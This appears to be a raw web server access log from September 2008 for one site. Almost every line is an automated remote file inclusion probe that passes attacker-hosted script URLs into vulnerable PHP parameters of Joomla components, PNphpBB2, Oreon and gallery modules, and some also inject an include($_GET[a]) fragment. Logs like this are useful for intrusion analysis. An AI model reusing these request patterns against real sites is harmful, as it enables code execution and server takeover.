200.11.67.242 - - [12/Sep/2008:10:56:30 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:31 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:31 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:34 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:35 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:35 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:35 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:35 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:36 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:10:56:39 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.16.214 - - [12/Sep/2008:10:56:39 -0700] "GET /logs/access_080302.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.joomlalecce.com/andrea/tondo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:10:56:39 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:10:56:39 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:10:56:42 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:42 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:10:56:42 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:10:56:43 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:10:56:45 -0700] "GET /logs/access_080403.log%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:56:47 -0700] "GET /logs/access_080331.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:56:47 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:56:47 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:56:48 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:56:53 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:10:56:57 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:10:56:58 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:10:56:58 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.16.214 - - [12/Sep/2008:10:56:59 -0700] "GET /logs/access_080302.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.joomlalecce.com/andrea/tondo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [12/Sep/2008:10:57:36 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.joomlalecce.com/andrea/tondo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [12/Sep/2008:10:57:36 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.joomlalecce.com/andrea/tondo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:57:44 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:57:45 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:57:55 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:57:55 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:57:55 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:57:58 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 200 89398 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:58:11 -0700] "GET /logs/access_080616.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:58:13 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:58:13 -0700] "GET /logs/access_080525.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:58:14 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:58:21 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:58:22 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:58:22 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:58:25 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:58:26 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:58:33 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:58:33 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:58:35 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:58:35 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:58:37 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:58:37 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:58:38 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:58:38 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:58:39 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:58:39 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:58:41 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
117.58.251.229 - - [12/Sep/2008:10:58:43 -0700] "GET /logs/access_080817.log//gallery/picture.php?cat=1&image_id=http://8.19.35.63/bhl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.81.114 - - [12/Sep/2008:10:58:43 -0700] "GET /logs/access_080623.log//includes/header.php?c_temp_path=http://www.geocitie.com/dedi_plg2007/injek/bantai.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:58:45 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:58:46 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:58:46 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:59:10 -0700] "GET /logs/access_080403.log%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:59:10 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:59:11 -0700] "GET /logs/access_080417.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:59:24 -0700] "GET /logs/access_080611.log/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:59:24 -0700] "GET /logs/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:59:25 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 200 89469 "-" "libwww-perl/5.810" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:10:59:25 -0700] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:10:59:25 -0700] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:59:26 -0700] "GET /logs/access_080512.log/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:10:59:34 -0700] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:59:51 -0700] "GET /logs/access_080331.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:10:59:52 -0700] "GET /bikes/dteel/2008_02_08/?M=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.255.39.100 - - [12/Sep/2008:10:59:52 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.antiquariatobova.com/menubg13.gif%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.255.39.100 - - [12/Sep/2008:10:59:52 -0700] "GET /logs/access_080619.log/include/bbs.lib.inc.php?site_path=http://www.antiquariatobova.com/menubg13.gif%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.255.39.100 - - [12/Sep/2008:10:59:53 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.antiquariatobova.com/menubg13.gif%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.255.39.100 - - [12/Sep/2008:10:59:59 -0700] "GET /logs/access_080628.log/include/bbs.lib.inc.php?site_path=http://www.antiquariatobova.com/menubg13.gif%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:00:08 -0700] "GET /logs/access_080308.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:00:08 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:00:08 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:11:00:09 -0700] "GET /logs/access_080417.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:00:16 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:00:16 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:00:16 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:00:16 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:00:17 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:00:17 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:00:19 -0700] "GET /logs/access_080308.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:00:19 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:00:19 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:00:20 -0700] "GET /logs/access_080308.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:00:20 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:00:20 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:00:55 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:00:56 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.proostjes.be/calendar/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:00:56 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.proostjes.be/calendar/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:00:56 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:00:56 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:11:00:58 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:11:00:58 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:11:01:22 -0700] "GET /logs/access_080524.log/main.php?config[search_disp]=true&include_dir=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:11:01:22 -0700] "GET /main.php?config[search_disp]=true&include_dir=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:11:01:22 -0700] "GET /logs/main.php?config[search_disp]=true&include_dir=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:11:01:24 -0700] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:01:41 -0700] "GET /logs/access_080407.log//templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:01:41 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:01:41 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:01:42 -0700] "GET /logs/access_080510.log//templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.120.234.168 - - [12/Sep/2008:11:01:48 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://bboard.heroicpub.com/includes/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
